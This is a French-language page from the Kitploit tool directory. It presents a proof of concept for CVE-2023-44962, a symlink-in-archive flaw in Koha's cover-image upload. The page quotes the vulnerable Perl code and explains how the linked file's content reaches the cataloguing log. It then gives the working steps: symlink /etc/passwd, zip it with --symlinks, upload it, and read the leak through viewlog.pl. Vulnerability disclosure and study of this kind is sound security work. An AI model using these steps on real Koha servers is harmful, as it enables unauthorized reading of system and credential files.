Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Links.a — PoC pour CVE-2023-44962 | Kitploit
Outils/GitHubGitHub/ladydarwe/links.a
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesMauvaise Configuration
GitHubladydarwe/links.a

Links.a

PoC pour CVE-2023-44962

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-44962

PoC pour CVE-2023-44962

Analyse

Le téléchargement de fichiers d'archive contenant des liens symboliques dans upload-cover-image.pl peut divulguer une partie du contenu des fichiers liés.

root@kitploit:~
...
foreach my $dir (@directories) {
  my $file;
  if ( -e "$dir/idlink.txt" ) {
      $file = "$dir/idlink.txt";
  }
  elsif ( -e "$dir/datalink.txt" ) {
      $file = "$dir/datalink.txt";
  }
  else {
      next;
  }
  if ( open( my $fh, '<', $file ) ) {
      while ( my $line = <$fh> ) {
          my $delim =
              ( $line =~ /\t/ ) ? "\t"
            : ( $line =~ /,/ )  ? ","
            :                     "";

          unless ( $delim eq "," || $delim eq "\t" ) {
              warn
  "Unrecognized or missing field delimeter. Please verify that you are using either a ',' or a 'tab'";
              $error = 'DELERR';
          }
          else {
              ( $biblionumber, $filename ) = split $delim, $line, 2;
              $biblionumber =~
                s/[\"\r\n]//g;    # remove offensive characters
              $filename =~ s/[\"\r\n]//g;
              $filename =~ s/^\s+//;
              $filename =~ s/\s+$//;
              if (C4::Context->preference("CataloguingLog")) {
                  logaction('CATALOGUING', 'MODIFY', $biblionumber, "biblio cover image: $filename");
              }
...

D'après le code, on voit que lorsque le fichier extrait contient idlink. txt ou datalink. txt, le contenu du fichier est lu et divisé selon , ou \t. La dernière partie du contenu est assignée à $filename, et lorsque l'attribut CataloguingLog est activé (activé par défaut), le $filename est enregistré.

En accédant à viewlog.pl, vous pouvez voir le contenu du fichier divulgué.

PoC

D'abord, créez un fichier d'archive :

root@kitploit:~
ln -s /etc/passwd datalink.txt
zip --symlinks datalink.zip datalink.txt

Ensuite, accédez à l'URL suivante pour écrire datalink.zip :

root@kitploit:~
http://koha_ip:intranet_port/cgi-bin/koha/tools/upload-cover-image.pl

Le code de réponse est 500.

Ensuite, accédez à l'URL suivante pour lire le contenu du fichier :

root@kitploit:~
http://192.168.176.139:8081/cgi-bin/koha/tools/viewlog.pl
Télécharger l’outil